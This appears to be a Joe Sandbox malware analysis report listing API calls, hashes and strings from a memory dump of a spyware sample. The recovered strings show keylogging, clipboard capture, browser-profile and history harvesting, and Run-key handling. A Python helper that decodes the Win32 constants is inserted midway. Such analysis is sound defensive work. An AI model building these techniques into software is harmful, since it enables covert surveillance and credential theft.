                                      • Opcode Fuzzy Hash: 1827881455c00197c5bcb875a79a66c0dde9f4aa45af04208978ae4deff5d3e4
                                      • Instruction Fuzzy Hash: A001D6B2A49212BEEE112A786CC4E27625DDFC13B93340776F731511D4DF60CC0285A0
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,02A0A74D), ref: 02A0A6AB
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,02A0A74D), ref: 02A0A6BA
                                      • Sleep.KERNEL32(00002710,?,?,?,02A0A74D), ref: 02A0A6E7
                                      • CloseHandle.KERNEL32(00000000,?,?,?,02A0A74D), ref: 02A0A6EE
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSizeSleep
                                      • String ID:
                                      • API String ID: 1958988193-0
                                      • Opcode ID: 9b0977521b22a9ca221026d2cac70bfa0dd080bc4b8984f6e7b74d24563b11a1
                                      • Instruction ID: e074a0eeb0fa1d52e95f82ad821c627544fc4c5c7e3a48f93bd6ef5684bb4773
                                      • Opcode Fuzzy Hash: 9b0977521b22a9ca221026d2cac70bfa0dd080bc4b8984f6e7b74d24563b11a1
                                      • Instruction Fuzzy Hash: 29110D30E80350EEE631A764B8E4A5F7B7ABB41355F440818F382476C3CF61E869C759
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,02A0412F,02A65E74), ref: 02A1C49E
                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,02A0412F,02A65E74), ref: 02A1C4B2
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,02A0412F,02A65E74), ref: 02A1C4D7
                                      • CloseHandle.KERNEL32(00000000,?,00000000,02A0412F,02A65E74), ref: 02A1C4E5
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 3919263394-0
                                      • Opcode ID: b6e9e5418e59b01cdc53c18c8b9e16d864773875f72fd7dfe42ca97cb7a92d5a
                                      • Instruction ID: 6c30b443c95fe1b015157ee3d6406f8050ad7d79665d74e59141a8622835e6fb
                                      • Opcode Fuzzy Hash: b6e9e5418e59b01cdc53c18c8b9e16d864773875f72fd7dfe42ca97cb7a92d5a
                                      • Instruction Fuzzy Hash: 57F062B1685319BFE6105A25ACC9FBF375DEB867B4F00052EF902A61C0DF258D069572
                                      APIs
                                      • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02A1C1F5
                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02A1C208
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02A1C233
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02A1C23B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleOpenProcess
                                      • String ID:
                                      • API String ID: 39102293-0
                                      • Opcode ID: 66812e3efbb7439d394dd7e861cda51ffb4858e8ac9b6954e2f49618b405bb1c
                                      • Instruction ID: c18279a9df76a724185b85f1bd951a33d8284c1a06b5a0fb42dff85689e913db
                                      • Opcode Fuzzy Hash: 66812e3efbb7439d394dd7e861cda51ffb4858e8ac9b6954e2f49618b405bb1c
                                      • Instruction Fuzzy Hash: BA0126B16C0326ABD614A2949C89F77F37DEB84BB1F000096FA04D3180EF608C42C6B2
                                      APIs
                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 02A3987A
                                        • Part of subcall function 02A39EB2: ___AdjustPointer.LIBCMT ref: 02A39EFC
                                      • _UnwindNestedFrames.LIBCMT ref: 02A39891
                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 02A398A3
                                      • CallCatchBlock.LIBVCRUNTIME ref: 02A398C7
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                      • String ID:
                                      • API String ID: 2633735394-0
                                      • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                      • Instruction ID: 1bfc9fa20313919cde043e83364b86546372ee8958fca8a6b80670f688911891
                                      • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                      • Instruction Fuzzy Hash: 5601D73200010ABBCF125F55CD40EDB3BBAEF99754F154154F95866120CBB6E461DFA1
                                      APIs
                                      • GetSystemMetrics.USER32(0000004C), ref: 02A193F0
                                      • GetSystemMetrics.USER32(0000004D), ref: 02A193F6
                                      • GetSystemMetrics.USER32(0000004E), ref: 02A193FC
                                      • GetSystemMetrics.USER32(0000004F), ref: 02A19402
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MetricsSystem
                                      • String ID:
                                      • API String ID: 4116985748-0
                                      • Opcode ID: 43e1e3790ad495531060b1f57d4dd427babb8a436d60d11e4f502396c100add3
                                      • Instruction ID: 7bb2a23b5f3db8a82af42616d5704d3795e6c4d2a1be97a572744c3ba4b48769
                                      • Opcode Fuzzy Hash: 43e1e3790ad495531060b1f57d4dd427babb8a436d60d11e4f502396c100add3
                                      • Instruction Fuzzy Hash: D7F0AFA1F803164BD740EA759891A2F6BD6EBC4270F10083EE2098B281EEB4DC058B81
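Reading the argument columns of the API entries above takes a constants table: the GetSystemMetrics indices 0x4C to 0x4F are SM_XVIRTUALSCREEN, SM_YVIRTUALSCREEN, SM_CXVIRTUALSCREEN and SM_CYVIRTUALSCREEN, the bounding rectangle of the whole multi-monitor desktop that a screen-capture routine needs; the two OpenProcess masks are PROCESS_QUERY_LIMITED_INFORMATION (0x1000) and PROCESS_QUERY_INFORMATION (0x400); the CreateFileW at 02A0A6AB opens an existing file GENERIC_READ with read/write/delete sharing, and the Sleep(0x2710) that follows is ten seconds. Joe Sandbox prints more stack slots than the function's arity, so the trailing entries (the 02A0A74D after Sleep's single parameter, for instance) are caller stack context, not arguments. The decoder below is an added example, not part of the report or of the Joe Sandbox IDA plugin: it parses API lines in the layout used here and expands the documented Win32 values for the calls seen in this section. The sample lines are copied from the entries above; only parameters up to each function's arity are decoded, the rest stay raw.

```python
import re
from typing import Any, Callable, Dict, List, Optional, Tuple

# Constructed input: API call lines copied from the function entries above,
# in the layout this report uses (bullet characters dropped).
SAMPLE_LINES = """\
GetSystemMetrics.USER32(0000004C), ref: 02A193F0
GetSystemMetrics.USER32(0000004F), ref: 02A19402
OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02A1C1F5
OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02A1C208
CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,02A0A74D), ref: 02A0A6AB
Sleep.KERNEL32(00002710,?,?,?,02A0A74D), ref: 02A0A6E7
GetKeyState.USER32(00000011), ref: 02A0B64B
_free.LIBCMT ref: 02A493BD
"""

API_RE = re.compile(
    r"(?P<api>\w+)\.(?P<mod>\w+)"          # e.g. OpenProcess.KERNEL32
    r"(?:\((?P<args>[^)]*)\))?"            # argument list, absent for CRT helpers
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"   # call-site address
)

# Documented Win32 values for the calls that appear in this section.
SM_INDEX = {0x4C: "SM_XVIRTUALSCREEN", 0x4D: "SM_YVIRTUALSCREEN",
            0x4E: "SM_CXVIRTUALSCREEN", 0x4F: "SM_CYVIRTUALSCREEN"}
VK_CODE = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU"}
PROCESS_ACCESS = {0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
                  0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
                  0x0020: "PROCESS_VM_WRITE", 0x0400: "PROCESS_QUERY_INFORMATION",
                  0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
            4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x2: "FILE_ATTRIBUTE_HIDDEN", 0x80: "FILE_ATTRIBUTE_NORMAL",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x40000000: "FILE_FLAG_OVERLAPPED"}


def _flags(table: Dict[int, str]) -> Callable[[int], str]:
    """Decoder that expands a bitmask into its named flags, keeping unknown bits."""
    def decode(value: int) -> str:
        names = [name for bit, name in sorted(table.items()) if value & bit]
        leftover = value & ~sum(table)
        if leftover:
            names.append(f"0x{leftover:X}")
        return "|".join(names) if names else "0"
    return decode


def _enum(table: Dict[int, str]) -> Callable[[int], str]:
    """Decoder for a single enumerated value."""
    return lambda value: table.get(value, f"0x{value:X}")


def _millis(value: int) -> str:
    return f"{value} ms" if value < 1000 else f"{value / 1000:g} s"


# Keyed by (API name, parameter index); anything else is printed as raw hex.
DECODERS: Dict[Tuple[str, int], Callable[[int], str]] = {
    ("GetSystemMetrics", 0): _enum(SM_INDEX),
    ("GetKeyState", 0): _enum(VK_CODE),
    ("OpenProcess", 0): _flags(PROCESS_ACCESS),
    ("CreateFileW", 1): _flags(GENERIC_ACCESS),
    ("CreateFileW", 2): _flags(SHARE_MODE),
    ("CreateFileW", 4): _enum(CREATION),
    ("CreateFileW", 5): _flags(FILE_FLAGS),
    ("Sleep", 0): _millis,
}


def decode_api_line(line: str) -> Optional[Dict[str, Any]]:
    """Parse one report line; returns None for lines that are not API entries."""
    m = API_RE.search(line)
    if not m:
        return None
    api, mod, ref = m.group("api"), m.group("mod"), m.group("ref")
    raw = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    decoded: List[str] = []
    for index, arg in enumerate(raw):
        try:
            value = int(arg, 16)
        except ValueError:
            decoded.append(arg)        # '?' (unknown) or an inline string argument
            continue
        fn = DECODERS.get((api, index))
        decoded.append(fn(value) if fn else f"0x{value:X}")
    return {"api": api, "module": mod, "ref": ref, "args": decoded}


def format_call(rec: Dict[str, Any]) -> str:
    return f"{rec['ref']} {rec['api']}.{rec['module']}({', '.join(rec['args'])})"


def summarize(text: str) -> List[str]:
    """Decode every API line in a block of report text."""
    out = []
    for line in text.splitlines():
        rec = decode_api_line(line)
        if rec:
            out.append(format_call(rec))
    return out


if __name__ == "__main__":
    print("\n".join(summarize(SAMPLE_LINES)))
```

Caveat on the argument parsing: a short inline string argument that happens to be valid hex (for example a three-letter token made of A to F) would be decoded as a number, so check the raw line when a decoded value looks odd.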
                                      APIs
                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 02A38F31
                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 02A38F36
                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 02A38F3B
                                        • Part of subcall function 02A3A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 02A3A44B
                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 02A38F50
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                      • String ID:
                                      • API String ID: 1761009282-0
                                      • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                      • Instruction ID: 21d0b356d83c1f2ca69e5fc21e9599a20299888551719925e038a6da2a298933
                                      • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                      • Instruction Fuzzy Hash: 40C048190C06A15C2CA37BB023893AD03972D62B98BC0A4D7FCE0A70038F0E001AAD37
                                      APIs
                                      • __startOneArgErrorHandling.LIBCMT ref: 02A42CED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorHandling__start
                                      • String ID: pow
                                      • API String ID: 3213639722-2276729525
                                      • Opcode ID: 1dccb436a1513f15165a3ac0ab1e5f598e6e94c6c67079c3c444bea1d8247147
                                      • Instruction ID: 5fd262eeb68193c12479254bdc8b8cc6abd9340934d4aa12b2d421f59d610dd9
                                      • Opcode Fuzzy Hash: 1dccb436a1513f15165a3ac0ab1e5f598e6e94c6c67079c3c444bea1d8247147
                                      • Instruction Fuzzy Hash: 6B517D71E44B029ACB127B14CD8037A2BB4EBC0B50F204DA9F896C26D9EF35C4D5DE46
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02A04066
                                        • Part of subcall function 02A1B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,02A0407C), ref: 02A1B99F
                                        • Part of subcall function 02A18568: CloseHandle.KERNEL32(02A040F5,?,?,02A040F5,02A65E74), ref: 02A1857E
                                        • Part of subcall function 02A18568: CloseHandle.KERNEL32(02A65E74,?,?,02A040F5,02A65E74), ref: 02A18587
                                        • Part of subcall function 02A1C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,02A0412F,02A65E74), ref: 02A1C49E
                                      • Sleep.KERNEL32(000000FA,02A65E74), ref: 02A04138
                                      Strings
                                      • /sort "Visit Time" /stext ", xrefs: 02A040B2
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                      • String ID: /sort "Visit Time" /stext "
                                      • API String ID: 368326130-1573945896
                                      • Opcode ID: 44d9aa90fea760698bc2b59c5efd43976ae3da063e06e02d055cd067993191d6
                                      • Instruction ID: 41ec457c249c34f77f747517ab7cc03806ba688228ec6f20295a83826e4b622e
                                      • Opcode Fuzzy Hash: 44d9aa90fea760698bc2b59c5efd43976ae3da063e06e02d055cd067993191d6
                                      • Instruction Fuzzy Hash: 7D315E31A802185ADB15FAB4FDD59EEB37BAF94310F40006AE50AA71D4EF205D4ACE91
                                      APIs
                                        • Part of subcall function 02A34770: __onexit.LIBCMT ref: 02A34776
                                      • __Init_thread_footer.LIBCMT ref: 02A0B797
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Init_thread_footer__onexit
                                      • String ID: [End of clipboard]$[Text copied to clipboard]
                                      • API String ID: 1881088180-3686566968
                                      • Opcode ID: de58a8431a7acac76e3ed68cedc7a7c194e9b99ac49449e123b3f909ab0e9d23
                                      • Instruction ID: 4eb4a79f4c8cd56eb33e8308318a1fd14d11391fca7e20ab38a2805ebc869ad1
                                      • Opcode Fuzzy Hash: de58a8431a7acac76e3ed68cedc7a7c194e9b99ac49449e123b3f909ab0e9d23
                                      • Instruction Fuzzy Hash: 862193319902049BCB18FB64FED1EEDB37AAF54714F50096AD50A531D1EF306D4ACEA4
                                      APIs
                                      • GetACP.KERNEL32(?,20001004,?,00000002), ref: 02A51C12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ACP$OCP
                                      • API String ID: 0-711371036
                                      • Opcode ID: 09c83c667716141a7c8be9006bc86379a734313e545b4bb237a4e7b382d8781e
                                      • Instruction ID: 9df7eb05c907df32653d4688c2cbc19db47b89b4f623109f45677e93ef7facb3
                                      • Opcode Fuzzy Hash: 09c83c667716141a7c8be9006bc86379a734313e545b4bb237a4e7b382d8781e
                                      • Instruction Fuzzy Hash: ED21B362A44520A7DB24CB6CC981BBB72AAEB54B69F478564EE0ED7500FF32DD40C390
                                      APIs
                                      • GetLocalTime.KERNEL32(?,02A75598,?,00000000,?,?,?,?,?,?,02A15CC9,?,00000001,0000004C,00000000), ref: 02A05030
                                        • Part of subcall function 02A1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02A1B509
                                      • GetLocalTime.KERNEL32(?,02A75598,?,00000000,?,?,?,?,?,?,02A15CC9,?,00000001,0000004C,00000000), ref: 02A05087
                                      Strings
                                      • KeepAlive | Enabled | Timeout: , xrefs: 02A0501F
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: KeepAlive | Enabled | Timeout:
                                      • API String ID: 481472006-1507639952
                                      • Opcode ID: 3df4b75628319471be72dcde71f81cca37e6529839b240178cc4b43442b9450d
                                      • Instruction ID: 4fa15c72152c729fbc9c3c79efceda260bfebf2b97d517e030454d0c7cff791e
                                      • Opcode Fuzzy Hash: 3df4b75628319471be72dcde71f81cca37e6529839b240178cc4b43442b9450d
                                      • Instruction Fuzzy Hash: F6210E61D843805FD700BB34E989B7FBBA9AB56318F880C1ADC4507185DF29962DCFE6
                                      APIs
                                      • GetLocalTime.KERNEL32(00000000), ref: 02A1B509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: | $%02i:%02i:%02i:%03i
                                      • API String ID: 481472006-2430845779
                                      • Opcode ID: 060c5080151cc9b4e594f51070c75e83b275956fce92ce399f7aeda1838f42ca
                                      • Instruction ID: 5a13bb0f160a45c27711d7b90c775801d5401ab438acbbd7f2d28fe809f1d665
                                      • Opcode Fuzzy Hash: 060c5080151cc9b4e594f51070c75e83b275956fce92ce399f7aeda1838f42ca
                                      • Instruction Fuzzy Hash: 5C1190714482045AC304EB61E9949FFB3EAAB48704F400D2FF89A820D0EF38DA49CA66
                                      APIs
                                        • Part of subcall function 02A0B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,02A750F0), ref: 02A0B172
                                        • Part of subcall function 02A0B164: wsprintfW.USER32 ref: 02A0B1F3
                                        • Part of subcall function 02A1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02A1B509
                                      • CloseHandle.KERNEL32(?), ref: 02A0B0B4
                                      • UnhookWindowsHookEx.USER32 ref: 02A0B0C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                      • String ID: Online Keylogger Stopped
                                      • API String ID: 1623830855-1496645233
                                      • Opcode ID: aacedf093519ed8286d19239cd03ca53f491b9284ce147614d6b66cc625f1b03
                                      • Instruction ID: c7889188e6a91398fc56f5ec5fdc8ad619d6b1aaded281df247c00be05a92a13
                                      • Opcode Fuzzy Hash: aacedf093519ed8286d19239cd03ca53f491b9284ce147614d6b66cc625f1b03
                                      • Instruction Fuzzy Hash: 79012830A403049BD7217F34EA8AB7E7BB6AB41314F40089DD546065C5EF611856CFE2
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 02A0C4F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                      • API String ID: 1174141254-4188645398
                                      • Opcode ID: 7e2c57147a3300a3ef2ea550b778ca84d48f86678f6a5265492a8ee5b107459e
                                      • Instruction ID: cbb65ec62170def415dab1ef63382714319937b8b6d39246ec2572d506e4fff4
                                      • Opcode Fuzzy Hash: 7e2c57147a3300a3ef2ea550b778ca84d48f86678f6a5265492a8ee5b107459e
                                      • Instruction Fuzzy Hash: 7EF08231980219A69B04B7F4FECA8FF7B3EAD14B11B400157A606A31C1EF609D05CAE1
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 02A0C5BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: AppData$\Opera Software\Opera Stable\
                                      • API String ID: 1174141254-1629609700
                                      • Opcode ID: a470a66a7360c757a1df2e839c15550999219c4c3ec0f0e60c34ea6ed7785030
                                      • Instruction ID: ec63bbce14d1315e65f1202079d254921cf6f6403175371dddf137b11a29a60a
                                      • Opcode Fuzzy Hash: a470a66a7360c757a1df2e839c15550999219c4c3ec0f0e60c34ea6ed7785030
                                      • Instruction Fuzzy Hash: 55F082319C0319A69B14F7B4EECACFF7B7EAD14B11B400157A606A20C1EF609D45CAE1
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 02A0C559
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                      • API String ID: 1174141254-2800177040
                                      • Opcode ID: db28f8b2e40d9a8bdae7f30d1065f5002a4320b2e1a82cdcb9c8e0ee17b72e35
                                      • Instruction ID: c33dc9e5d4c973d3fc7ca4ccb5639144bcabf4734794c93e42a26894c33e913b
                                      • Opcode Fuzzy Hash: db28f8b2e40d9a8bdae7f30d1065f5002a4320b2e1a82cdcb9c8e0ee17b72e35
                                      • Instruction Fuzzy Hash: 6AF08231D80319A69B14B7B5FECA8FF7B7EAD14B11B000557A606A21C1EF609D45CAE1
                                      APIs
                                      • GetKeyState.USER32(00000011), ref: 02A0B64B
                                        • Part of subcall function 02A0A3E0: GetForegroundWindow.USER32 ref: 02A0A416
                                        • Part of subcall function 02A0A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 02A0A422
                                        • Part of subcall function 02A0A3E0: GetKeyboardLayout.USER32(00000000), ref: 02A0A429
                                        • Part of subcall function 02A0A3E0: GetKeyState.USER32(00000010), ref: 02A0A433
                                        • Part of subcall function 02A0A3E0: GetKeyboardState.USER32(?), ref: 02A0A43E
                                        • Part of subcall function 02A0A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 02A0A461
                                        • Part of subcall function 02A0A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 02A0A4C1
                                        • Part of subcall function 02A0A636: SetEvent.KERNEL32(?,?,00000000,02A0B20A,00000000), ref: 02A0A662
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                      • String ID: [AltL]$[AltR]
                                      • API String ID: 2738857842-2658077756
                                      APIs
                                      • GetKeyState.USER32(00000012), ref: 02A0B6A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: State
                                      • String ID: [CtrlL]$[CtrlR]
                                      • API String ID: 1649606143-2446555240
                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,02A0D4CE,00000000,?,00000000), ref: 02A13A31
                                      • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 02A13A45
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 02A13A2F
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteOpenValue
                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                      • API String ID: 2654517830-1051519024
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,02A01D55), ref: 02A40D27
                                      • GetLastError.KERNEL32 ref: 02A40D35
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02A40D90
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 1717984340-0
                                      APIs
                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 02A11B8C
                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 02A11C58
                                      • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02A11C7A
                                      • SetLastError.KERNEL32(0000007E,02A11EF0), ref: 02A11C91
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastRead
                                      • String ID:
                                      • API String ID: 4100373531-0